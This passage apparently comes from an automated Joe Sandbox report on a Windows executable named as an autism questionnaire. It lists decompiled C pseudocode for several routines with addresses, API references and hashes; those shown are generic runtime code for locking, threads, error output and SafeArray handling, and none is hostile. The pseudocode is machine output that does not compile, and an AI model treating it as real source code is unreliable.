				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                                              0x0040668f
                                                                                              0x00406691
                                                                                              0x00406693
                                                                                              0x00406696
                                                                                              0x00406696
                                                                                              0x0040669d
                                                                                              0x004066a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004066b2
                                                                                              0x004066b9
                                                                                              0x00406751
                                                                                              0x00406751
                                                                                              0x00406751
                                                                                              0x00406755
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406760
                                                                                              0x00406766
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406768
                                                                                              0x00406768
                                                                                              0x0040676d
                                                                                              0x00406773
                                                                                              0x0040677a
                                                                                              0x00406784
                                                                                              0x00406789
                                                                                              0x00406790
                                                                                              0x00406797
                                                                                              0x004067a5
                                                                                              0x004067b3
                                                                                              0x004067a7
                                                                                              0x004067af
                                                                                              0x004067af
                                                                                              0x004067a5
                                                                                              0x004067b9
                                                                                              0x004067db
                                                                                              0x004067e4
                                                                                              0x004067e8
                                                                                              0x004067ec
                                                                                              0x00000000
                                                                                              0x004067bb
                                                                                              0x004067bb
                                                                                              0x004067c0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067cc
                                                                                              0x004067d2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067d4
                                                                                              0x00000000
                                                                                              0x004067d4
                                                                                              0x004067bb
                                                                                              0x004067f1
                                                                                              0x004067f1
                                                                                              0x00406800
                                                                                              0x00406807
                                                                                              0x0040680a
                                                                                              0x0040680a
                                                                                              0x00000000
                                                                                              0x00406800
                                                                                              0x00000000
                                                                                              0x00406751
                                                                                              0x004066c4
                                                                                              0x004066ca
                                                                                              0x004066d0
                                                                                              0x0040672c
                                                                                              0x0040672f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406736
                                                                                              0x0040673e
                                                                                              0x00406744
                                                                                              0x0040674f
                                                                                              0x00000000
                                                                                              0x0040674f
                                                                                              0x00406746
                                                                                              0x00000000
                                                                                              0x00406746
                                                                                              0x00000000
                                                                                              0x004066d2
                                                                                              0x004066d5
                                                                                              0x00000000
                                                                                              0x004066e4
                                                                                              0x004066e4
                                                                                              0x004066e4
                                                                                              0x00000000
                                                                                              0x004066ed
                                                                                              0x004066f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004066f5
                                                                                              0x0040671e
                                                                                              0x00406722
                                                                                              0x00406727
                                                                                              0x0040672a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040672a
                                                                                              0x004066fe
                                                                                              0x00406704
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040670b
                                                                                              0x0040670e
                                                                                              0x00406715
                                                                                              0x00000000
                                                                                              0x00406715
                                                                                              0x00406811
                                                                                              0x0040681c

                                                                                              APIs
                                                                                                • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                                              • GetTickCount.KERNEL32 ref: 004066BF
                                                                                              • GetTickCount.KERNEL32 ref: 004066D7
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                                              • GetTickCount.KERNEL32 ref: 00406731
                                                                                              • GetTickCount.KERNEL32 ref: 00406768
                                                                                              • GetTickCount.KERNEL32 ref: 00406792
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CurrentThread
                                                                                              • String ID:
                                                                                              • API String ID: 3968769311-0
                                                                                              • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                              • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                                              • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                              • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                                                              0x004971ac
                                                                                              0x004971ac
                                                                                              0x004971ac
                                                                                              0x004971ad
                                                                                              0x004971af
                                                                                              0x004971b6
                                                                                              0x004971bb
                                                                                              0x004971bd
                                                                                              0x004971c0
                                                                                              0x004971c0
                                                                                              0x004971c5
                                                                                              0x004971c7
                                                                                              0x004971ca
                                                                                              0x004971ce
                                                                                              0x004971cf
                                                                                              0x004971d4
                                                                                              0x004971d7
                                                                                              0x004971de
                                                                                              0x004971e3
                                                                                              0x004971e9
                                                                                              0x004971ee
                                                                                              0x004971f6
                                                                                              0x004971fa
                                                                                              0x004971fa
                                                                                              0x004971fa
                                                                                              0x004971fc
                                                                                              0x00497203
                                                                                              0x00497284
                                                                                              0x0049728c
                                                                                              0x00497205
                                                                                              0x00497209
                                                                                              0x0049722c
                                                                                              0x0049723e
                                                                                              0x0049720b
                                                                                              0x00497211
                                                                                              0x00497224
                                                                                              0x00497224
                                                                                              0x00497245
                                                                                              0x00497251
                                                                                              0x00497259
                                                                                              0x0049725c
                                                                                              0x00497266
                                                                                              0x00497273
                                                                                              0x00497278
                                                                                              0x00497278
                                                                                              0x00497245
                                                                                              0x00497291
                                                                                              0x00497294
                                                                                              0x00497297
                                                                                              0x004972a4

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                                                • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                                              • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$Current$CreateErrorLast
                                                                                              • String ID: 0@G$XtI$l@
                                                                                              • API String ID: 3539746228-385768319
                                                                                              • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                              • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                                              • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                              • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 36%
                                                                                              			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                                              0x00406425
                                                                                              0x00406427
                                                                                              0x0040642c
                                                                                              0x00406446
                                                                                              0x004064d9
                                                                                              0x004064d9
                                                                                              0x00000000
                                                                                              0x0040644c
                                                                                              0x0040644c
                                                                                              0x0040644f
                                                                                              0x00406450
                                                                                              0x00406452
                                                                                              0x00406459
                                                                                              0x00000000
                                                                                              0x00406465
                                                                                              0x0040646d
                                                                                              0x00406472
                                                                                              0x00406473
                                                                                              0x00406478
                                                                                              0x0040647b
                                                                                              0x00406481
                                                                                              0x00406485
                                                                                              0x00406486
                                                                                              0x0040648b
                                                                                              0x00406492
                                                                                              0x004064bc
                                                                                              0x004064be
                                                                                              0x004064c1
                                                                                              0x004064c4
                                                                                              0x004064d1
                                                                                              0x00406494
                                                                                              0x00406494
                                                                                              0x004064af
                                                                                              0x004064b2
                                                                                              0x004064ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004064ba
                                                                                              0x004064a5
                                                                                              0x004064a8
                                                                                              0x004064e0
                                                                                              0x004064e6
                                                                                              0x004064e6
                                                                                              0x00406492
                                                                                              0x00406459
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                                              • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                              • API String ID: 4275029093-79381301
                                                                                              • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                              • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                                              • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                              • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 43%
                                                                                              			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                                              0x004076c0
                                                                                              0x00407726
                                                                                              0x00407728
                                                                                              0x0040772a
                                                                                              0x0040772f
                                                                                              0x00407734
                                                                                              0x00407736
                                                                                              0x00407736
                                                                                              0x0040773c
                                                                                              0x004076c2
                                                                                              0x004076cb
                                                                                              0x004076db
                                                                                              0x004076db
                                                                                              0x004076f7
                                                                                              0x0040770a
                                                                                              0x0040771e
                                                                                              0x0040771e

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 3320372497-2970929446
                                                                                              • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                              • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                                              • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                              • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                                                              0x00420532
                                                                                              0x0042055f
                                                                                              0x00420564
                                                                                              0x00420569
                                                                                              0x00420573
                                                                                              0x00420534
                                                                                              0x00420544
                                                                                              0x00420549
                                                                                              0x0042054e
                                                                                              0x0042054e

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                                              • API String ID: 1883125708-3870080525
                                                                                              • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                              • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                                              • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                              • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                                              0x0042931c
                                                                                              0x00429328
                                                                                              0x0042932e
                                                                                              0x00429334
                                                                                              0x00429344
                                                                                              0x0042934b
                                                                                              0x0042934b
                                                                                              0x00429356
                                                                                              0x00429364
                                                                                              0x004294ef
                                                                                              0x004294f6
                                                                                              0x004294f7
                                                                                              0x00000000
                                                                                              0x0042936a
                                                                                              0x0042936d
                                                                                              0x0042938b
                                                                                              0x0042936f
                                                                                              0x0042937a
                                                                                              0x0042937a
                                                                                              0x0042939a
                                                                                              0x004293a6
                                                                                              0x004293a9
                                                                                              0x00429416
                                                                                              0x0042941c
                                                                                              0x0042941d
                                                                                              0x00429423
                                                                                              0x00429424
                                                                                              0x00429426
                                                                                              0x0042942b
                                                                                              0x0042942f
                                                                                              0x00429431
                                                                                              0x00429431
                                                                                              0x0042943c
                                                                                              0x00429447
                                                                                              0x00429452
                                                                                              0x0042945b
                                                                                              0x0042945e
                                                                                              0x0042947a
                                                                                              0x00429481
                                                                                              0x0042948c
                                                                                              0x004294a3
                                                                                              0x004294a8
                                                                                              0x004294bc
                                                                                              0x004294c1
                                                                                              0x004294d4
                                                                                              0x004294d4
                                                                                              0x004294dd
                                                                                              0x00429460
                                                                                              0x00429460
                                                                                              0x00429461
                                                                                              0x00429467
                                                                                              0x0042946d
                                                                                              0x0042946f
                                                                                              0x00429471
                                                                                              0x00429474
                                                                                              0x00429477
                                                                                              0x00429477
                                                                                              0x0042947a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0042947a
                                                                                              0x004293ab
                                                                                              0x004293ab
                                                                                              0x004293ac
                                                                                              0x004293ae
                                                                                              0x004293b4
                                                                                              0x004293b6
                                                                                              0x004293c5
                                                                                              0x004293c6
                                                                                              0x004293d0
                                                                                              0x004293d1
                                                                                              0x004293d6
                                                                                              0x004293e1
                                                                                              0x004293e2
                                                                                              0x004293ec
                                                                                              0x004293ed
                                                                                              0x004293f2
                                                                                              0x0042940d
                                                                                              0x0042940f
                                                                                              0x00429410
                                                                                              0x00429413
                                                                                              0x00429413
                                                                                              0x00000000
                                                                                              0x004293b4
                                                                                              0x004293a9

                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
